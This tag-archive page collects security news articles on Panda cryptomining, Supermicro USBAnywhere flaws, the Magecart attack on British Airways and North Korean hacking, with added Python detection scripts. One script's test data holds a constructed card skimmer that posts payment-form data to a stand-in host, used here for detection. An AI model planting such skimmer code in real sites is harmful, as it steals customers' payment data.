Tag Archives: Threat

Global cryptomining attacks use NSA exploits to earn Monero

A new threat group has launched cryptomining attacks around the globe and is using exploits from the National Security Agency to spread its malware.

The threat group, dubbed ‘Panda,’ was revealed this week in a new report from Cisco Talos. Christopher Evans and Dave Liebenberg, threat researcher and head of strategic intelligence, respectively, at Cisco Talos, wrote that although the group is “far from the most sophisticated” it has been very active and willing to “update their infrastructure and exploits on the fly as security researchers publicize indicators of compromises and proof of concepts.”

“Panda’s willingness to persistently exploit vulnerable web applications worldwide, their tools allowing them to traverse throughout networks, and their use of RATs, means that organizations worldwide are at risk of having their system resources misused for mining purposes or worse, such as exfiltration of valuable information,” Evans and Liebenberg wrote in a blog post. “Our threat traps show that Panda uses exploits previously used by Shadow Brokers and Mimikatz, an open-source credential-dumping program.”

The NSA exploits include EternalBlue, which targets a flaw in version 1 of Microsoft’s Server Message Block (SMB) protocol that Microsoft patched in March 2017 as MS17-010; hosts that never took that update remain exploitable. The researchers first became aware of Panda’s cryptomining attacks in the summer of 2018 and told SearchSecurity that over the past year they’ve seen daily activity in the organization’s honeypots.

“We see them in several of our honeypots nearly every day, which tells me they’re targeting a large portion of the internet,” Evans said. “Our honeypots are deployed throughout the world, and I’ve never seen a geographic focus of their attacks in the data. The applications they target are widely deployed, and without patching are easy targets.”

Since January, the researchers have watched Panda’s cryptomining attacks shift to different vulnerabilities, first a ThinkPHP web framework flaw and then an Oracle WebLogic flaw, and move to new infrastructure both in March and again over the past month.

“They also frequently update their targeting, using a variety of exploits to target multiple vulnerabilities, and [are] quick to start exploiting known vulnerabilities shortly after public POCs become available, becoming a menace to anyone slow to patch,” the researchers wrote. “And, if a cryptocurrency miner is able to infect your system, that means another actor could use the same infection vector to deliver other malware.”

Liebenberg told SearchSecurity, “It appears that instead of employing good OpSec they focus on volume. That’s one reason why they’ll keep using old, burned infrastructure while still deploying new ones.” 

Evans and Liebenberg said in their research that the Panda group has made approximately 1,215 Monero (a cryptocurrency that emphasizes privacy), which equates to almost $100,000 today. One Monero is currently equal to $78, but the value of Monero has fluctuated — beginning the year around $50 and peaking over $110 in June.

The researchers have confirmed Panda cryptomining attacks against organizations in the banking, healthcare, transportation, telecommunications and IT services industries. Evans and Liebenberg also told SearchSecurity that the best way for organizations to detect if they have been attacked would be to “look for prolonged high system utilization, connections to mining pools using common mining ports (3333, 4444), watching for common malware persistence mechanisms, watching for DNS traffic to known mining pools and enabling the appropriate rules in your IDS.”
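The detection advice above is easy to turn into hunting logic. The following is an added example, not Cisco Talos code and not part of the article: it runs three rules (outbound connections to the mining ports the researchers named, DNS lookups for pool domains, and prolonged outbound sessions) over constructed, simplified connection and DNS records. The record layout, the internal address ranges, the pool watchlist (reserved example names) and the one-hour threshold are all assumptions made for the demo.

```python
"""Hunt for cryptomining indicators in constructed network logs.

Added example, not Cisco Talos code or anything from the article: it turns the
researchers' advice (mining ports 3333/4444, DNS lookups for known pools,
prolonged outbound connections) into rules over simplified, constructed
connection and DNS records. The record layout, internal ranges, pool
watchlist and one-hour threshold are assumptions made for the demo.
"""
import ipaddress
from dataclasses import dataclass

MINING_PORTS = {3333, 4444}   # ports named by Talos; 4444 is also a common reverse-shell port
POOL_DOMAINS = {"pool.xmr.example", "stratum.monero-pool.example"}  # constructed watchlist
LONG_LIVED_SECONDS = 3600     # assumption: an hour-old outbound session is "prolonged"
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed connection records: ts, src, sport, dst, dport, proto, duration_seconds
CONN_LOG = """\
1567000000.1\t10.1.2.10\t51022\t203.0.113.7\t3333\ttcp\t7200.0
1567000001.2\t10.1.2.11\t49800\t198.51.100.20\t443\ttcp\t12.5
1567000002.3\t10.1.2.12\t50111\t203.0.113.9\t443\ttcp\t9000.0
1567000003.4\t10.1.2.10\t51023\t10.1.2.1\t53\tudp\t0.2
1567000004.5\t10.1.2.13\t50200\t198.51.100.30\t4444\ttcp\t5.0
"""
# Constructed DNS query records: ts, src, query
DNS_LOG = """\
1566999999.9\t10.1.2.10\tpool.xmr.example
1567000001.0\t10.1.2.11\twww.example.com
1567000002.0\t10.1.2.14\tstratum.monero-pool.example.
"""


@dataclass(frozen=True)
class Finding:
    host: str    # internal host that tripped the rule
    rule: str    # which rule fired
    detail: str  # what it saw


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def parse_conn(text):
    """Yield one dict per tab-separated connection record."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, sport, dst, dport, proto, dur = line.split("\t")
        yield {"ts": float(ts), "src": src, "dst": dst, "dport": int(dport),
               "proto": proto, "duration": float(dur)}


def parse_dns(text):
    """Yield one dict per tab-separated DNS query record (query normalised)."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, query = line.split("\t")
        yield {"ts": float(ts), "src": src, "query": query.lower().rstrip(".")}


def hunt(conn_text: str, dns_text: str) -> list:
    """Run the three rules and return every individual hit."""
    findings = []
    for c in parse_conn(conn_text):
        if is_internal(c["dst"]):
            continue  # only outbound traffic matters for pool connections
        if c["dport"] in MINING_PORTS:
            findings.append(Finding(c["src"], "mining_port",
                                    f"{c['dst']}:{c['dport']}/{c['proto']}"))
        if c["duration"] >= LONG_LIVED_SECONDS:
            findings.append(Finding(c["src"], "prolonged_connection",
                                    f"{c['dst']}:{c['dport']} open {c['duration']:.0f}s"))
    for d in parse_dns(dns_text):
        q = d["query"]
        if any(q == p or q.endswith("." + p) for p in POOL_DOMAINS):
            findings.append(Finding(d["src"], "pool_dns", q))
    return findings


def suspects(findings, min_rules: int = 2) -> list:
    """Hosts that tripped at least min_rules distinct rules.

    One long-lived TLS session is normal; a long-lived session to a mining
    port from a host that also resolved a pool name is not.
    """
    rules_by_host = {}
    for f in findings:
        rules_by_host.setdefault(f.host, set()).add(f.rule)
    return sorted(h for h, rules in rules_by_host.items() if len(rules) >= min_rules)


if __name__ == "__main__":
    hits = hunt(CONN_LOG, DNS_LOG)
    for f in hits:
        print(f"{f.host:12} {f.rule:22} {f.detail}")
    print("suspects:", suspects(hits))
```

Run it and the only host that tripped more than one rule is the one holding a two-hour session to a mining port after resolving a pool name; the single-rule hits stay in the output for an analyst to triage. In production you would feed it Zeek conn.log and dns.log rather than the constructed records and keep the pool list current, since the article notes Panda rotates infrastructure as indicators are published.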

USBAnywhere vulnerabilities put Supermicro servers at risk

Security researchers discovered a set of vulnerabilities in Supermicro servers that could allow threat actors to remotely attack systems as if they had physical access to the USB ports.

Researchers at Eclypsium, based in Beaverton, Ore., discovered flaws in the baseboard management controllers (BMCs) of Supermicro servers and dubbed the set of issues “USBAnywhere.” The researchers said authentication issues put servers at risk because “BMCs are intended to allow administrators to perform out-of-band management of a server, and as a result are highly privileged components.

“The problem stems from several issues in the way that BMCs on Supermicro X9, X10 and X11 platforms implement virtual media, an ability to remotely connect a disk image as a virtual USB CD-ROM or floppy drive. When accessed remotely, the virtual media service allows plaintext authentication, sends most traffic unencrypted, uses a weak encryption algorithm for the rest, and is susceptible to an authentication bypass,” the researchers wrote in a blog post. “These issues allow an attacker to easily gain access to a server, either by capturing a legitimate user’s authentication packet, using default credentials, and in some cases, without any credentials at all.”

Because the virtual USB device behaves exactly like a physically attached one, an attacker who reaches the virtual media service could boot a new operating system image, deploy malware or disable the target. The researchers noted, however, that the attack requires network reach to the BMC: either the BMC is exposed directly to the internet, or the attacker already has a foothold inside the corporate network.

Rick Altherr, principal engineer at Eclypsium, told SearchSecurity, “BMCs are one of the most privileged components on modern servers. Compromise of a BMC practically guarantees compromise of the host system as well.”

Eclypsium said there are currently “at least 47,000 systems with their BMCs exposed to the internet and using the relevant protocol.” These systems are at additional risk because BMCs are rarely powered off, and the authentication bypass persists until the BMC itself is turned off or loses power.

Altherr said he found the USBAnywhere vulnerabilities because he “was curious how virtual media was implemented across various BMC implementations,” but Eclypsium found that only Supermicro systems were affected.

According to the blog post, Eclypsium reported the USBAnywhere flaws to Supermicro on June 19 and provided additional information on July 9, but Supermicro did not acknowledge the reports until July 29.

“Supermicro engaged with Eclypsium to understand the vulnerabilities and develop fixes. Supermicro was responsive throughout and worked to coordinate availability of firmware updates to coincide with public disclosure,” Altherr said. “While there is always room for improvement, Supermicro responded in a way that produced an amicable outcome for all involved.”

Altherr added that customers should “treat BMCs as a vulnerable device. Put them on an isolated network and restrict access to only IT staff that need to interact with them.”

Supermicro noted in its security advisory that isolating BMCs from the internet would reduce the risk from USBAnywhere but not eliminate it entirely. Firmware updates are currently available for affected Supermicro systems, and in addition to updating, Supermicro advised users to disable virtual media by blocking TCP port 623, the port on which the virtual media service listens.
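The first practical step the advice above implies is finding out which of your BMCs answer on that port and from where. The following is an added example, not Eclypsium’s or Supermicro’s code: it parses Nmap greppable (-oG) output for hosts with 623/tcp open and reports whether each one sits inside an allowlisted management network. The scan output is constructed for the demo and the management range is an assumption; note that the service in question is TCP/623, not the UDP/623 used by IPMI over RMCP.

```python
"""Find BMCs exposing the virtual media service (TCP 623) in a scan result.

Added example, not Eclypsium's or Supermicro's code. Parses Nmap greppable
(-oG) output for hosts with 623/tcp open and flags those reachable outside
the allowlisted management networks. The scan output is constructed and the
management range is an assumption. TCP/623 here is the virtual media
service, not the UDP/623 used by IPMI over RMCP.
"""
import ipaddress
import re

VIRTUAL_MEDIA_PORT = 623
# Assumption: the only networks from which BMC access is supposed to happen.
MANAGEMENT_NETS = [ipaddress.ip_network("10.20.0.0/24")]

# Constructed -oG output. Each "Ports:" entry is port/state/proto/owner/service/rpc/version/
SCAN = """\
# Nmap 7.80 scan initiated as: nmap -sT -p 22,443,623 -oG - 10.20.0.0/28 192.0.2.0/29
Host: 10.20.0.5 ()\tStatus: Up
Host: 10.20.0.5 ()\tPorts: 22/open/tcp//ssh///, 443/open/tcp//https///, 623/open/tcp//oob-ws-http///\tIgnored State: closed (0)
Host: 10.20.0.6 ()\tPorts: 22/open/tcp//ssh///, 443/closed/tcp//https///, 623/filtered/tcp//oob-ws-http///
Host: 192.0.2.3 ()\tPorts: 443/open/tcp//https///, 623/open/tcp//oob-ws-http///
Host: 192.0.2.4 ()\tStatus: Up
# Nmap done
"""

# "Host: <ip> (<name>)<tab>Ports: <entries>[<tab>Ignored State: ...]"
HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(.*?\)\s+Ports:\s+(.*?)(?:\t|$)")


def parse_gnmap(text: str) -> dict:
    """Return {ip: [(port, state, proto, service), ...]} from -oG output."""
    hosts = {}
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # comments and "Status:" lines carry no port data
        ip, ports_field = m.group(1), m.group(2)
        entries = []
        for entry in ports_field.split(","):
            fields = entry.strip().split("/")
            if len(fields) < 5:
                continue
            entries.append((int(fields[0]), fields[1], fields[2], fields[4]))
        hosts.setdefault(ip, []).extend(entries)
    return hosts


def exposed_virtual_media(hosts: dict, mgmt_nets=MANAGEMENT_NETS) -> list:
    """Hosts with 623/tcp open, those outside the management networks first."""
    report = []
    for ip, entries in hosts.items():
        open_vm = any(p == VIRTUAL_MEDIA_PORT and state == "open" and proto == "tcp"
                      for p, state, proto, _svc in entries)
        if not open_vm:
            continue
        addr = ipaddress.ip_address(ip)
        inside = any(addr in net for net in mgmt_nets)
        report.append({
            "host": ip,
            "outside_management_net": not inside,
            "action": ("isolate now, then update firmware" if not inside
                       else "update firmware; confirm only admins can reach it"),
        })
    return sorted(report, key=lambda r: (not r["outside_management_net"], r["host"]))


if __name__ == "__main__":
    for r in exposed_virtual_media(parse_gnmap(SCAN)):
        where = "OUTSIDE mgmt net" if r["outside_management_net"] else "inside mgmt net"
        print(f"{r['host']:12} 623/tcp open  {where:17} -> {r['action']}")
```

The result ranks hosts reachable from outside the management network first. An open 623/tcp inside the management network still means the virtual media service is on and the firmware fix is needed; a port scan cannot distinguish patched from unpatched firmware, so treat every hit as work.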

Data-driven operating model propels Adobe’s digital business success

Adobe stands as a textbook case of a software company that faced the threat of digital disruption head-on and emerged a winner. The company’s move from selling Photoshop software disks in a box to selling subscription-based digital media services online is based in no small part on its building a data-driven operating model.

Leading the data effort is Mark Picone, vice president for information and data services at Adobe. He works to ensure that data is curated, accurate and useful to the front-line teams that “turn the knobs on the business.”

In a video from the recent MIT Sloan CIO Symposium, Picone highlights the approaches Adobe teams took to build a data architecture that broke down data silos and consequently improved Adobe’s business analytics efforts.

“We treat the data as a product,” Picone explains. “Having a product approach to what we’re building allows us to build once and serve many and create a set of capabilities that is very impactful.”

Editor’s note: This transcript has been edited for clarity and length.

What role do data services play in digital transformation at Adobe? What is the model?

Mark Picone: Our job really is to be an enabler for the company and enable the company to be data driven. There are a lot of things that make that very difficult. You can say data is developed, and it’s created all over the place. But how can you create a [data-driven operating] model such that the data is stitched together, it’s curated, it’s governed, it’s the right data, it’s correct? [Only] then can you create mechanisms to be able to better communicate with customers, or engage the customers or just better understand your business.

We’ve done that with this data-driven operating model. The data-driven operating model has really allowed us to look across all of the silos that we had four or five years ago, which were really a result of going to the cloud and going into subscriptions, and rationalize that together to create a single view of the customer.

That single view of the customer, though, is based on very strong governance techniques and also a unified data architecture. Combined with that, we are able to take what I call an ‘outside-in approach’ of creating customer journeys.

The customer journey — which, for our consumer-based business, [involves products like] Photoshop, InDesign, and Illustrator — [the customer steps are] discover, try, buy, use and renew. Across every one of those steps, we actually assigned owners and organizations to own those different KPIs [key performance indicators] within that journey step — and, then, to create calls to action.

That outside-in approach allowed us to create data sets and analytical experiences that we now use to run the entirety of our digital media business. And it’s been transformational from a number of different points.

When we close the business every week, there’s a group of over 100 people that get together and look at the single source of truth … journey step by journey step, and they understand what’s happening in that market. Did our annual recurring revenue go up or down? What was traffic? What were the ads? What were the promotions? And they basically use that to turn the knobs on the business. … They do that on a week-in, week-out basis. …

How can data play a role in achieving operational efficiencies?

Picone: The operational efficiencies come [from] reporting the same metrics up to management in the same way. There’s no question about what that metric is. …

But, really, the true value is in how we run that business. The way we do ad spend has radically changed, the way we do targeting and testing has radically changed because we now have a purview of every product across every geography, across every route to market.

And, when you make those decisions now, you actually see how the annual recurring revenue took place for [individual] customers over time. It is the same thing when we do A/B targeting. …

We’ve taken this whole [data-driven] digital operating model and created a playbook. And this didn’t happen when we created, it happened after we actually did it, and we said, ‘Wow, there’s a lot of reusability here.’ — not just from a systems and a capabilities perspective, like platforms, governance and data architecture, but really from the methodology. The methodology really allows us to have this inside-out approach of understanding all of your data assets, categorizing them, creating a database that has the lowest level of granularity, gets curated and is ready for analytics. …

Then, you combine that with that top-down approach, which is customer journey steps, assigned organizations and processes, and that yields actionable results. And we’re actually taking that [digital business] model and rolling it out to other parts of our business, even internal organizations and finance — as an example, procurement to pay. …

We treat the data as a product. We are an internal team. Our customers are all largely internal — although the data we create personalizes real-time experiences within the products. …

And we’ve introduced a step over the past year that we call ‘code development.’ And that’s where we really open source the data. So, now, the data is available for others to bring their engineers or third parties, whatever the case may be, to come into our environment and actually build data assets and expand the nucleus of what we call our ‘unified data architecture.’

So, having a product approach to what we’re building allows us to build once and serve many and create a set of capabilities that is very impactful. We are spending less and less time creating data sets and visualizations and more time creating capabilities that will actually enable the entirety of the organization.

British Airways data breach may be the work of Magecart

The British Airways data breach may have been the handiwork of the threat actor group known as Magecart.

Security researchers at the threat intelligence company RiskIQ Inc., reported that they suspect Magecart was behind the late August British Airways data breach, based on their analysis of the evidence. The Magecart group focuses on online credit card skimming attacks and is believed to be behind the Ticketmaster data breach discovered in June 2018.

British Airways disclosed on Sept. 6 that it had suffered a breach affecting around 380,000 customers. The company said the compromised personal and payment information was that entered in payment transactions made on the website and the mobile app between Aug. 21 and Sept. 5.

In a blog post published a week later, RiskIQ researcher Yonathan Klijnsma said that because the British Airways data breach announcement stated that the breach had affected the website and mobile app but made no mention of breaches of databases or servers, he noticed similarities between this incident and the Ticketmaster breach.

The Ticketmaster breach was caused by a web-based credit card skimming scheme that targeted e-commerce sites worldwide. The RiskIQ team said that the Ticketmaster breach was the work of the hacking group Magecart, and was likely not an isolated incident, but part of a broader campaign run by the group.

The similarities between the Ticketmaster breach and the reports of the British Airways data breach led Klijnsma and the RiskIQ team to look at Magecart’s activity.

“Because these reports only cover customer data stolen directly from payment forms, we immediately suspected one group: Magecart,” Klijnsma wrote. “The same type of attack happened recently when Ticketmaster UK reported a breach, after which RiskIQ found the entire trail of the incident.”

Klijnsma said they were able to expand the timeline of the Ticketmaster activity and discover more websites affected by online credit card skimming.

“Our first step in linking Magecart to the attack on British Airways was simply going through our Magecart detection hits,” Klijnsma explained. “Seeing instances of Magecart is so common for us that we get at least hourly alerts for websites getting compromised with their skimmer-code.”

He noted that in the British Airways case the team received no automated alerts, because the group had customized its skimmer enough to slip past RiskIQ’s existing detection. When the researchers examined British Airways’ web and mobile apps directly, they found both the similarities to earlier Magecart skimmers and the differences.

“This attack is a simple but highly targeted approach compared to what we’ve seen in the past with the Magecart skimmer which grabbed forms indiscriminately,” Klijnsma wrote. “This particular skimmer is very much attuned to how British Airway’s (sic) payment page is set up, which tells us that the attackers carefully considered how to target this site instead of blindly injecting the regular Magecart skimmer.”

Klijnsma also said it was likely Magecart had access to the British Airways website and mobile app before the attack reportedly started.

“While we can never know how much reach the attackers had on the British Airways servers, the fact that they were able to modify a resource for the site tells us the access was substantial, and the fact they likely had access long before the attack even started is a stark reminder about the vulnerability of web-facing assets,” he wrote.

Magecart, RiskIQ noted, has been active since 2015 and has been growing progressively more threatening as it customizes its skimming schemes for particular brands and companies.
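Two controls follow directly from the RiskIQ findings: notice when a script the site serves changes, and notice when a script starts talking to a host that is not the site’s own. The following is an added example, not RiskIQ’s or British Airways’ code. It compares fetched scripts against a deploy-time hash baseline, emits a Subresource Integrity value for each known-good script, and applies a crude heuristic for skimmer behaviour (an event hook on the payment form plus a request to a foreign host). File names, script contents, the skimmer-like snippet and the first-party host list are all constructed for the demo.

```python
"""Detect tampering with a site's own script resources and flag foreign hosts.

Added example, not RiskIQ's or British Airways' code. (a) Compares scripts a
monitor fetched against a deploy-time SHA-256 baseline, (b) emits a
Subresource Integrity value for each known-good script, (c) applies a crude
skimmer heuristic: a form/input event hook plus a request to a host that is
not first-party. File names, contents and host lists are constructed.
"""
import base64
import hashlib
import re

# Assumption: the only hosts the site's own scripts are allowed to talk to.
FIRST_PARTY_HOSTS = {"www.example.com", "api.example.com"}

# Constructed known-good scripts as deployed.
KNOWN_GOOD = {
    "js/vendor.js": b"window.vendor={version:'1.0'};",
    "js/checkout.js": b"function submitPayment(){fetch('https://api.example.com/pay',{method:'POST'})}",
}

# Constructed skimmer-like snippet: serialises the payment form on mouseup and
# posts it to a host the site does not own.
SKIMMER = (b"window.onload=function(){document.getElementById('submitButton')"
           b".addEventListener('mouseup',function(){var d=JSON.stringify("
           b"$('#paymentForm').serializeArray());var x=new XMLHttpRequest();"
           b"x.open('POST','https://collector.example.net/gate',true);x.send(d)})};")

# Constructed snapshot fetched later: checkout.js has the skimmer appended.
FETCHED = {
    "js/vendor.js": KNOWN_GOOD["js/vendor.js"],
    "js/checkout.js": KNOWN_GOOD["js/checkout.js"] + b";" + SKIMMER,
}


def build_baseline(files: dict) -> dict:
    """Map each resource path to the SHA-256 hex digest of its content."""
    return {path: hashlib.sha256(content).hexdigest() for path, content in files.items()}


def diff_baseline(baseline: dict, fetched: dict) -> tuple:
    """Return (changed, missing, unexpected) resource paths."""
    current = build_baseline(fetched)
    changed = sorted(p for p in baseline if p in current and current[p] != baseline[p])
    missing = sorted(p for p in baseline if p not in current)
    unexpected = sorted(p for p in current if p not in baseline)
    return changed, missing, unexpected


def sri_value(content: bytes) -> str:
    """Subresource Integrity attribute value (sha384, base64) for a script body."""
    return "sha384-" + base64.b64encode(hashlib.sha384(content).digest()).decode("ascii")


def script_tag(src: str, content: bytes) -> str:
    """<script> tag pinned to known-good content, so a swapped file fails to load."""
    return f'<script src="{src}" integrity="{sri_value(content)}" crossorigin="anonymous"></script>'


URL_RE = re.compile(rb"https?://([A-Za-z0-9.-]+)")
HOOK_RE = re.compile(rb"(mouseup|touchend|submit|keyup)")


def foreign_hosts(script: bytes) -> set:
    """Hosts referenced by absolute URLs in the script that are not first-party."""
    return {h.decode() for h in URL_RE.findall(script)} - FIRST_PARTY_HOSTS


def looks_like_skimmer(script: bytes) -> bool:
    """Crude heuristic: an input/form event hook plus a request to a foreign host."""
    return bool(HOOK_RE.search(script)) and bool(foreign_hosts(script))


if __name__ == "__main__":
    changed, missing, unexpected = diff_baseline(build_baseline(KNOWN_GOOD), FETCHED)
    print("changed:", changed, "missing:", missing, "unexpected:", unexpected)
    for path in changed:
        print(f"  {path}: foreign hosts {foreign_hosts(FETCHED[path])}, "
              f"skimmer-like={looks_like_skimmer(FETCHED[path])}")
    for path, content in KNOWN_GOOD.items():
        print(script_tag("/" + path, content))
```

SRI only helps while the HTML carrying the integrity attribute is itself intact, and the hash baseline only catches changes to what the monitor fetches, so both belong alongside integrity monitoring of the deployed files on the server. The skimmer heuristic is deliberately crude and will flag legitimate analytics scripts; its value is in narrowing what a human reads after a baseline change.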

In other news

  • President Donald Trump signed an executive order this week that imposes sanctions on anyone who attempts to interfere with U.S. elections. After Russian interference in the 2016 U.S. presidential election, there are fears of further interference in the upcoming 2018 midterm elections. The order provides for sanctions on foreign companies, organizations or individuals found to have interfered with U.S. elections. It requires government agencies to report suspicious or malicious activity to the director of national intelligence, who investigates the report and determines its validity. If the director of national intelligence finds that the suspect group or individual has interfered, a 45-day review and assessment period follows, during which the departments of Justice and Homeland Security decide whether sanctions are warranted. If they are, the foreign group or individual could have their U.S. assets frozen or be banned from the country.
  • A vulnerability in Apple’s Safari web browser enables attackers to launch phishing attacks. Security researcher Rafay Baloch discovered the vulnerability and was also able to replicate it in the Microsoft Edge browser. Baloch published the proof of concept for both browser vulnerabilities early this week, and while Microsoft had addressed the issue in its August Patch Tuesday release — citing an issue with properly parsing HTTP content as the cause — Apple has yet to issue any patches for it. The vulnerability in Safari iOS 11.3.1 could thus still be used to spoof address bars and trick users into thinking they are visiting a legitimate site that is actually malicious.
  • The hacker known as “Guccifer” will be extradited to the U.S. to serve a 52-month prison sentence. A Romanian court ruled that the hacker, who is known for exposing the misuse of Hillary Clinton’s private email server before the 2016 U.S. presidential election and whose real name is Marcel Lehel Lazar, will be extradited to America to serve his 52-month sentence after finishing his seven-year sentence in Romania — his home country. Lazar pleaded guilty in May 2016 to charges of unauthorized access to a protected computer and aggravated identity theft. Lazar is believed to have hacked into the accounts of around 100 people between 2012 and 2014, including former Secretary of State Colin Powell, CBS Sports’ Jim Nantz and Sidney Blumenthal, a former political aide to Bill Clinton and adviser to Hillary Clinton.

North Korea hacking threat still looms despite summit

Times may be changing for diplomatic relations between North Korea and the U.S., but the threat of North Korean hacking still looms.

This week’s summit between President Donald Trump and North Korean leader Kim Jong Un could lead to improved relations between the two countries and a possible denuclearization plan for North Korea. However, it’s unclear what impact, if any, the summit may have on nation-state cyberattacks coming from the country. According to various reports from the summit, the talks between Kim and Trump did not include any provisions concerning cyberattacks, and several cybersecurity companies have said there is evidence that North Korean hacking attacks may be ramping up this year.

Several notable cyberattacks have been attributed to the North Korean government in recent years, including the 2014 breach of Sony Pictures and last year’s global WannaCry ransomware attacks. In addition, the FBI and the Department of Homeland Security recently issued a security advisory tying two well-known malware campaigns, Joanap and Brambul, to the North Korean hacking group Hidden Cobra, also known as Lazarus Group.

Priscilla Moriuchi, director of strategic threat development at Recorded Future, a threat intelligence provider based in Somerville, Mass., told SearchSecurity that while Kim’s regime wants to increase the country’s role in the international community, there’s no indication the government has curbed its hacking efforts.

In fact, she said there are signs that the opposite may be occurring.

“What we can say from looking at the data is that there are two stories: the data story, which shows us that North Korea increasingly cares about being monitored and watched, and that they are taking measures to hide their activity online; and the diplomacy story, where it’s telling the rest of the world that it’s ready to denuclearize and be more transparent,” Moriuchi said. “And the two stories just don’t match up.”

Recorded Future published research in April that showed a massive increase in anonymization of North Korean internet activity. “We conducted the research back in July, and we saw, for example, that less than 1% of all web browsing activity was anonymized — they didn’t even use HTTPS most of the time, let alone [virtual private networks (VPNs)],” she said, either because they didn’t care about hiding activity or because they didn’t know they could anonymize traffic. “But six months later, it was a completely different story — there was about a 12,000% increase in anonymization services and technology.”

Recorded Future issued another report last week detailing an increasingly large presence of U.S. technology in North Korean networks and usage by North Korean leadership, despite economic sanctions that prevent such trade. Moriuchi said North Korea has “professionalized sanctions evasion” over the last three-plus decades and found various ways to exploit weaknesses in U.S. export controls.

“We think this is a problem for two reasons. First, there are gaping holes in U.S. export control regime, and they’re being exploited by this rogue nation,” she said. “Second, the U.S. government doesn’t want U.S. technology being used in cyberattacks from North Korea to harm businesses and government agencies.”

Even if Kim agrees to a denuclearization plan, there may be little incentive for the government to drop its hacking operations. Ross Rustici, senior director of intelligence services at Boston-based threat detection vendor Cybereason, believes North Korea’s hacking operations are a crucial bargaining chip for Kim and also present a unique threat to the Trump administration.

“North Korea currently lacks many options to force the U.S. into working inside a START [Strategic Arms Reduction Treaty] framework. Almost all of its military and foreign policy capabilities are defensive at this point,” Rustici wrote in a research post last month, prior to the summit. “The one exception is its cyberprogram. And, unfortunately, this is one domain where North Korea can impact the Trump brand in a way that it could not against any other President.”

Several vendors have reported increased sophistication and capabilities from suspected North Korean hacking groups this year. For example, Dragos Inc., a security firm based in Hanover, Md., that specializes in industrial control systems (ICS), published a threat report on a group it calls Covellite, which the company said uses malware and infrastructure similar to Hidden Cobra.

Dragos noted that Covellite, which had targeted U.S. organizations in the past, had recently abandoned North American companies and focused its attacks on European and Asian companies. Dragos also said that while Covellite lacks ICS-specific capabilities at this time, the group’s “rapidly improving capabilities, and history of aggressive targeting” made it a primary threat to the ICS industry.  

In addition to Hidden Cobra, FireEye earlier this year reported that another North Korean hacking group known as APT37 had demonstrated increased capabilities, including the use of an Adobe Flash zero-day vulnerability (CVE-2018-4878) in attacks on South Korean targets. “Our analysis of APT37’s recent activity reveals that the group’s operations are expanding in scope and sophistication, with a toolset that includes access to zero-day vulnerabilities and wiper malware,” FireEye wrote, adding it has “high confidence” that the group is working on behalf of the North Korean government.

Threat hunting technology is on the rise, so are threats

More companies are adopting threat hunting functions, according to a recent survey from Crowd Research Partners, but detection of advanced threats remains elusive.

Threat hunting typically involves human security analysts identifying impending incidents or attacks that automated threat detection systems may have missed. The frequency of threats and the potential damage and impact of security incidents continue to outpace the capabilities of security operations centers (SOC), Crowd Research Partners’ “2018 Threat Hunting Report” found.

Fifty-eight percent of IT security professionals said cyberthreats against their organizations had doubled during the past 12 months; only 8% said threats had decreased. Respondents estimated that their SOCs missed 39% of threats on average. At 58% of organizations, most attacks were discovered within one to seven days, and the average attacker dwell time was 30 days.

The top challenges facing SOCs, according to those surveyed, included the following:

  • detection of advanced cyberthreats — hidden, unknown and emerging threats (55%);
  • lack of skilled personnel (43%);
  • lack of confidence in threat detection technologies (36%);
  • too much time wasted on false alerts (35%);
  • slow response time to find or detect advanced threats (31%);
  • outdated SIEM and SOC infrastructure (29%); and
  • lack of proper reporting tools (28%).

In order to offset some of these challenges, the report found that approximately one-third of the organizations surveyed had outsourced threat hunting to a managed security service provider.

Crowd Research Partners conducted an online survey of 461 security and IT professionals in the Information Security Community group on LinkedIn. Respondents came from industries such as technology (17%); financial services, banking and insurance (14%); telecommunications (6%); and healthcare (5%). Government cybersecurity professionals represented 20% of those surveyed.

Mix of analysts and tools

According to the survey, 40% of respondents reported that security analysts at their organizations used threat hunting platforms, up 5 percentage points from a similar survey in 2017. Benefits ranged from improved detection of advanced threats to less time spent coordinating events. The top indicators of compromise most frequently investigated by security analysts included behavior anomalies (67%), IP addresses (58%), domain names (46%), denied or flagged connections (46%) and file names (32%).

Security operations centers had more analysts hunting in 2018, at 17%, compared with 14% in 2017. More than half, however, have five or fewer analysts in their SOCs dedicated to threat hunting, the report found.

While security operations centers at some organizations are maturing, along with a greater awareness of threat hunting, 33% of those surveyed indicated limited SOC capabilities when it came to emerging threats; 28% said their SOC was advanced; 24% reported it was compliant, but behind the curve; and only 15% said their SOC was cutting-edge. 

Companies used a variety of tools for threat hunting. The top technologies included the following:

  • next-generation firewalls, intrusion prevention systems and antivirus software (55%);
  • SIEM (50%);
  • antiphishing or other messaging security software (49%);
  • threat intelligence platforms (39%);
  • enrichment and investigation tools (34%); and
  • vulnerability management (32%).

The majority of threat hunting was performed in-house (56%). Some companies used a hybrid of in-house and service provider (22%); others outsourced threat hunting (11%). Meanwhile, 11% of survey respondents reported that their organizations did “no proactive threat hunting.”

Security analysts at 60% of the organizations said they do not currently use threat hunting platforms or techniques. However, six out of 10 organizations indicated plans to build a threat hunting program in the next three years, according to the “2018 Threat Hunting Report,” which is produced in partnership with multiple vendors.

Barriers to adoption ranged from lack of budget (45%) to untrained personnel (7%). The tools desired most often for threat hunting included threat intelligence (69%), user and entity behavior analytics (57%), automatic detection (56%), and machine learning and automated analytics (56%).

According to proponents of threat hunting programs, such as David Bianco, who served as a technology adviser for Sqrrl Data Inc., before the startup company was acquired by Amazon Web Services earlier this year, one of the benefits is security teams can take what they find and use it to improve automated detection.

Microsoft announces new intelligent security innovations to help businesses manage threats from cloud to edge

Amid evolving digital threats, an innovative IoT security solution, integrated threat intelligence and advanced protection in Microsoft 365 help simplify cybersecurity for businesses

SAN FRANCISCO, April 16, 2018 — At a news conference on Monday, Microsoft Corp. announced several new intelligent security tools and technologies to help enterprises more easily secure their data and networks against today’s biggest threats as well as address emerging threats aimed at IoT and edge devices. These new solutions build on Microsoft’s longstanding approach to delivering innovation that customers and partners can build upon to strengthen the broader ecosystem against cyberattacks from the cloud to the edge.

